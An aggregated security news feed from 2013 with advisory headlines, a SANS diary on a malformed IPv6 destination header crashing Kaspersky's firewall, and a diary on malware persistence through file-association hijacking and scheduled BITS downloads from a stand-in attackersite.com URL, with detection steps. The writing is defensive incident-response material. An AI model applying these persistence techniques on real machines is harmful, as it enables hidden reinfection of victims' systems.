(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Genesco, a specialty retailer of footwear, sports apparel and related accessories has sued Visa USA for $13.3 million in fines that were assessed against the company after a credit card data breach in 2010.
LinuxSecurity.com: Several security issues were fixed in the kernel.
LinuxSecurity.com: Several security issues were fixed in Puppet.
LinuxSecurity.com: Updated tomcat5 packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having [More...]
LinuxSecurity.com: Updated kernel packages that fix two security issues and several bugs are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having [More...]
LinuxSecurity.com: Updated qemu-kvm-rhev packages that fix one security issue are now available for Red Hat OpenStack Folsom. The Red Hat Security Response Team has rated this update as having [More...]
LinuxSecurity.com: PHP could be made to expose sensitive information over the network.
LinuxSecurity.com: A security issue was identified and fixed in mozilla firefox: VUPEN Security, via TippingPoint's Zero Day Initiative, reported a use-after-free within the HTML editor when content script is run by the document.execCommand() function while internal editor operations [More...]
LinuxSecurity.com: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical [More...]
LinuxSecurity.com: Multiple vulnerabilities has been found and corrected in coreutils: Long line inputs could trigger a segfault in the sort, uniq and join utilities (CVE-2013-0221, CVE-2013-0222, CVE-2013-0223). [More...]
LinuxSecurity.com: Multiple vulnerabilities has been found and corrected in openssh: The auth_parse_options function in auth-options.c in sshd in OpenSSH before 5.7 provides debug messages containing authorized_keys command options, which allows remote authenticated users to obtain potentially [More...]
LinuxSecurity.com: Thunderbird could be made to crash or run programs as your login.
LinuxSecurity.com: Multiple vulnerabilities were discovered in Puppet, a centralized configuration management system. CVE-2013-1640 [More...]

For the first time ever, the Obama administration has publicly admitted to developing offensive cyberweapons that could be aimed at foreign nations during wartime.

According to an article published Tuesday night by The New York Times, that admission came from General Keith Alexander, the chief of the military's newly created Cyber Command. He said officials are establishing 13 teams of programmers and computer experts who would focus on offensive capabilities. Previously, Alexander publicly emphasized defensive strategies in electronic warfare to the almost complete exclusion of offense.

"I would like to be clear that this team, this defend-the-nation team, is not a defensive team," Alexander, who runs both the National Security Agency and the new Cyber Command, told the House Armed Services Committee on Tuesday. "This is an offensive team that the Defense Department would use to defend the nation if it were attacked in cyberspace. Thirteen of the teams that we’re creating are for that mission alone."

Read 3 remaining paragraphs | Comments

Google will pay $7 million to US states and will have to run a "Privacy Week" annually for the next ten years as part of the settlement over its sniffing of Wi-Fi data from its Street View cars

Cisco Video Surveillance Operations Manager Multiple vulnerabilities
Foscam Prior to Directory Traversal Vulnerability
VMware View CVE-2012-5978 Directory Traversal Vulnerability
[ MDVSA-2013:024 ] firefox
[ MDVSA-2013:023 ] coreutils
Re: [CVE-REQUEST] Foscam <= path traversal vulnerability
March's Patch Tuesday updates contain fixes for Internet Explorer 8 and a USB drive exploit. Plus, the company released non-security updates.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

Kasperksy today released an update to its personal firewall product for Windows. The patched vulnerability fits very nicely into our current focus on IPv6.

A packet with a large Destination Header caused the firewall to crash and drop all traffic.

IPv6 uses a very minimal IP header. Instead of providing space for options or fragmentation fields, many of these features are now fulfilled by extension headers. As a rule of thumb, most of your packets passing a firewall will not use extension headers. But extension headers do pose a challenge to firewalls.

In IPv4, following the IPv4 header is typically a transport protocol header like TCP or UDP. A firewall needs to collect information from IP as well as transport protocol header in order to make its filtering decission. For IPv4, the maximum IPv4 header size is 60 bytes and another 60 bytes can be used for the TCP header.

In IPv6, one or more extension headers may be inserted between IPv6 and transport header. Some of these extension headers can be up to 2kBytes in length. As a result, firewalls need to inspect more data in order to make a filter decision about the packet.

The vulnerability in Kasperkys product was found using the THC IPv6 test suite. It includes a tool firewall6 that can be used to create various odd and malformed IPv6 packet to test firewalls. Several of the options (for example test 18 and 19) produce packets will destination headers exceeding 2,000 bytes. These tests crashed Kasperskys firewall.

An exerpt from a packet created by test 19 is shown below:

Internet Protocol Version 6, Src: fe80::20c:29ff:fe27:cb5a (fe80::20c:29ff:fe27:cb5a), Dst: ff02::1 (ff02::1)
0110 .... = Version: 6
Next header: IPv6 fragment (44)
Hop limit: 255
Destination: ff02::1 (ff02::1)
Fragmentation Header
Destination Option
Next header: IPv6 destination option (60)
Length: 254 (2040 bytes)
IPv6 Option (Pad1)

The Next Header field in the IPv6 header is a fragmentation header. The packet was too larger for the local MTU of 1,500 bytes. The fragmentation header is then followed by a fragemented, large, destination header. The destination header only contains PAD options used to fill the 2,040 bytes.

This particular test also sets the next header field of the destiation header to destination header promissing two destination headers following each other, but this appears to be not the trigger (other tests that crash Kaspersky do not have this feature, but the long DH is common to all of them).


Johannes B. Ullrich, Ph.D.

SANS Technology Institute

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Since the start of the year, hackers have been exploiting vulnerabilities in Java to carry out a string of attacks against companies including Microsoft, Apple, Facebook and Twitter, as well as home users. Oracle has made an effort to respond faster to the threats and to strengthen its Java software, but security experts say the attacks are unlikely to let up any time soon.
The question of whether you're getting the bandwidth you pay for is one that just doesn't go away. Twice in the last few months I've suspected my ADSL connection of running slow and, sure enough, despite the modem telling me I had 3Mbps down and 500Kbps up, for whatever reason, restarting the modem fixed the problem.
Android head Andy Rubin is stepping aside, and that could mean big changes for Google's mobile platform and for its Chrome operating system.
Try this, try that and see what entices customers. That's the mantra for tablet makers that are experimenting with new tablet features in the elusive quest to deliver the next big hit.
Amazon on Wednesday lowered the starting price of its large-screen 8.9-in. Kindle Fire HD tablet in the U.S. to $269 for the Wi-Fi version and to $399 for the 4G version.
With the intent of rounding out its software stack for building hybrid clouds, Oracle is acquiring Nimbula, a provider of private cloud infrastructure management software.
For the Internet of Things to become a reality, networks need to get a whole lot smarter and more flexible, according to Cisco.
Microsoft has fixed a problem that caused an outage for many users of Hotmail and the service that is replacing it, Outlook.com. Maintenance work continued to affect the calendaring component of Hotmail, however.
Google's decision to bring its Android and Chrome divisions together under Sundar Pichai should result in greater work between the two platforms, but Pichai first needs to rein in the fast expanding operating system and bring some order to the business, analysts said Wednesday.
Few tech industry buzzwords have gotten as vigorous a workout as "big data," but while the hype remains plentiful, it is starting to give way to real-life successes as well as formal ways companies can develop big data strategies, according to a number of IDC analysts.
Offensive Security has launched Kali Linux, a version of the well-known BackTrack pentesting distribution targeted at enterprises. The company has partnered with Rapid7 to integrate the Metasploit framework as an officially supported tool

Announcing ChronIC - a wearable Sub-GHz RF hacking tool
Re: Squid 3.2.7 DoS (loop, 100% cpu) strHdrAcptLangGetItem() at errorpage.cc
If you're not sure about the purpose behind Daiyuu Nobori's online thesis project, perhaps the large picture of the collapse of the Berlin Wall will help.
Calculating the real ROI of cloud apps requires the analysis of a lot of factors, and cutting corners on that process means you might not save money.
Microsoft will release security updates for applications in its Windows Store as those patches are available in order to speed up the updating process.
Google has acquired a startup from the computer science department of the University of Toronto to get key researchers in the area of deep neural networks.
The number of teenagers in the U.S. using smartphones has risen sharply, with half of them accessing the Internet mainly through the device, according to a recent study.
New HTC One smartphone will arrive later than expected, and could lose any time-to-market advantage over Samsung's upcoming Galaxy S4 handset.
BlackBerry faces a herculean task marketing the new Z10 smartphone to U.S. consumers.
The most interesting of the holes Microsoft has closed on its monthly patch day is only rated "important". It allows passing security staff and colleagues to hijack a Windows PC

Oracle Java SE CVE-2012-3342 Remote Java Runtime Environment Vulnerability
Oracle Java SE CVE-2012-1541 Remote Java Runtime Environment Vulnerability

Details from some of the famous identity-theft victims whose personal information was mysteriously published online were fraudulently obtained from a government-mandated website designed to make it easy for consumers to access their credit reports, credit agency officials said.

At least four of the high-profile celebrities and political figures—who include Vice President Joe Biden, FBI Director Robert Mueller, Attorney General Eric Holder, and rap star Jay Z—were "accessed inappropriately" from annualcreditreport.com, a spokesman for credit agency Equifax told Ars. The site allows consumers to obtain a free copy of their credit reports by entering their birth dates, Social Security numbers, and home addresses and then answering several multiple-choice questions involving previous addresses, mortgages or loans taken out, and similar types of information. Once someone provides the correct answers, he gets access to a report providing a wealth of additional personal information, including loan and mortgage details, phone numbers, and previous addresses.

"What it appears happened is that personal identifiable information was evidently accessed or somehow obtained by the fraudsters who therefore were able to go into annualcreditreport.com and get some pieces of information on some individuals," Equifax spokesman Tim Klein said in an interview. "It's four individuals that we can confirm that were accessed inappropriately by fraudsters by going through annualcreditreport.com and procuring some information off their Equifax credit report."

Read 7 remaining paragraphs | Comments


At Shmoocon 2013 Jake Williams (@MalwareJake) and I gave a presentation entitled Wipe the Drive. The point of the presentation was that you should always wipe the drive and reinstall the OS after a confirmed malware infection. We all know wiping the drive is the safest move but there are business pressures to simply remove the known malware and move on. Also, because we are security professionals there is often an expectation that we are able to remove all the malware. But, in my and Jakes opinion, relying on a clean scan from antivirus products isnt the best approach. The time and effort required to accurately analyze the capabilities of malware and conduct forensic analysis to determine if those capabilities were used is usually not in the cards. There is always an element of risk management, but whenever you possibly can, just wipe the drive. To illustrate the point we began developing a list of ways that malware or an active attacker on your computer can make small configuration changes to you machine. The changes create a mis-configuration that makes the target exploitable or set events in motion that will cause the target to automatically get re-compromised in the future. There are a very large number of changes and misconfigurations that attackers can make but our talk focused around eight of them. The only criteria for these techniques is that they launch a process in an unusual way and ideally they dont have any processes running (so you can avoid detection by memory forensics). I will discuss a few of the methods we came up with and how you might detect these changes. First lets talk about file extension hijacking.

TECHNIQUE #1 - File Associations Hijacking

What happens when you click on a .TXT file? The operating system checks the HKEY_CLASSES_ROOT hive for the associated extension to see what program it should launch. Here we see the associate for .TXT files mapped to txtfile.

Further down in the HKEY_CLASSES_ROOT hive we find the entry for txtfile where the applications that are used to open and print are defined. Here you can see that NOTEPAD.EXE is the application that will launch when the OS tries to OPEN a txt file.

What if the attacker or his malware changes this association? Instead of launching notepad it tells the OS to launch NOTPAD.EXE. NOTPAD.EXE is wrapper around the real NOTEPAD.EXE but it also contains a malicious payload. During the initial infection the attacker makes this change and leaves his NOTPAD.EXE behind. You remove the initial attack vector and do memory forensics to find nothing running on the host. Sometime later, after memory of the incident fades the administrator checks his logs by clicking on a .TXT file. It launches NOTPAD.EXE which in turn launches NOTEPAD.EXE and reinfects the machine.

In an alternate version of this attack a new file extension is created such as .WTD. When the attacker is ready to reinfect you they send in email with a .WTD extension. When it is opened on the victims machine they are reinfected.

I am sure some of you will say, but NOTPAD.EXE will be detected by AV. Perhaps, but remember the point of these is to evade memory forensics. For the most part, evading antivirus software is trivial.


How do you detect this? Well, baseline the contents of your HKEY_CLASSES_ROOT registry key and then periodically check its current state against that baseline. Investigate any changes to see what executes when you click on the file extensions that have changed. We all know it is dangerous to click links on the internet. Unfortunately links on your computer arent any safer once an attacker has had a chance to change where they go.


BITS is the Background Intelligent Transfer System. This service is used by your operating system to download patches from Microsoft or your local WSUS server. But this service can also be used to schedule the download of an attackers malware to reinfect your system. Once the attacker or his malware are on on your machine he execute BITSADMIN to schedule the download of http://attackersite.com/malware.exe. He schedules the job to only retry the URL once a day and automatically execute the program after it is successfully downloaded. The attacker doesnt put anything at that URL today. Instead, he simply waits for you to finish your incident handling process and look the other way. You can scan the machine with 100 different virus scanners. Today there is no file on your system to detect. You can do memory forensics all day. Sorry, there is nothing running today. Today it is just a simple configuration change to the OS. Then when he is ready he places malware.exe on his site. Your machine dutifully downloads the new malware and executes it.


This one is easier to find. The BITSADMIN tool also lets you view scheduled downloads. You can get a list of scheduled task with the command BITSADMIN /LIST

Here you can see there is a job called getsome that is currently scheduled on this machine. BITSADMIN /LISTFILES jobname takes a scheduled job as a parameter and returns a list of URLs the job is scheduled to download. For example, here we see that job getsome is scheduled to download from the url HTTP://attackerssite.com/malware.exe and it will save the file as c: empmalware.exe.

But how does the malware execute after it is downloaded? BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. The intention is that you can execute a program and have it send you an email or fire an alert in a network monitoring system. Lets check the notification program on this program with BITSADMIN /GETNOTIFYCMDLINE jobname. To use it provide the job name as an argument like this:

Here you can see that after the malware is successfully downloaded to c: empmalware.exe the BITS service will launch c: empmalware.exe to notify the administrator.


Add checking the BITSADMIN queue to your incident response checklist. If you find something scheduled dont rely on simply deleting the job. In a moderately complex operating system there are an infinite number of places to hide. Ill talk about more of these types of techniques during my upcoming handler shifts. When you have malware on your machine, just wipe the drive.

Follow me on Twitter @MarkBaggett

Here is an AWESOME DEAL on some SANS training. Join Justin Searle and I for SANS new SEC573 Python for Penetration Testers course at SANSFire June 17-21. It is a BETA so the course is 50% off! Sign up today!


There are two opprotunities to join Jake Williams for FOR610 Reverse Engineering Malware. Join him on vLive with Lenny Zeltser or at the Digital Forensics Incident Response Summit in Austin.

vLive with Jake and Lenny begins March 28th, 2013:


Jake at DFIR Austin Texas July 11-15, 2013:

http://www.sans.org/event/dfir-summit-2013/course/reverse-engineering-malware-malware-analysis-tools-techniques (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Microsoft experienced disruptions for several hours to its online suite of mail, calendar and storage services, leaving many users unable to access their accounts.

Posted by InfoSec News on Mar 12


By Kim Zetter
Threat Level

A sports apparel retailer is fighting back against the arbitrary
multi-million-dollar penalties that credit card companies impose on banks and
merchants for data breaches by filing a first-of-its-kind $13 million lawsuit
against Visa.

The suit takes on the payment card industry’s powerful money-making system of
punishing merchants...

Posted by InfoSec News on Mar 12


By John Leyden
The Register
12th March 2013

An open-source IT monitoring software firm has clashed with a security
consultancy over the seriousness of a security bug in its technology.

GroundWork's technology provides a platform for IT operations management
(network, system, application, and cloud monitoring) that is used by customers
including Hitachi Data...

Posted by InfoSec News on Mar 12


By Jeremy Kirk
IDG News Service
March 12, 2013

A website that provides U.S. consumers with a free annual credit report
appears to have been the source used by hackers to download those of
celebrities including BeyoncA(c) and government officials including
Federal Bureau of Investigation Director Robert Mueller.

On Tuesday, a...

Posted by InfoSec News on Mar 12

Forwarded from: M <mmca (at) layerone.org>


LayerOne 2013 Security Conference
Call for Papers
The 2013 Call for Paper is currently OPEN.

LayerOne 2013 Security Conference
May 25-26, 2013
Monrovia, California
(Monrovia Doubletree)


The ninth annual LayerOne security conference is now accepting submissions for
topic and speaker selection. As always, we are interested seeing a...

Posted by InfoSec News on Mar 12


By Ellen Nakashima
The Washington Post
March 12, 2013

The Pentagon’s Cyber Command will create 40 offensive cyber-teams by the fall
of 2015 to help defend the nation against major computer attacks and assist
combat commands as they plan offensive capabilities, Gen....
Internet Storm Center Infocon Status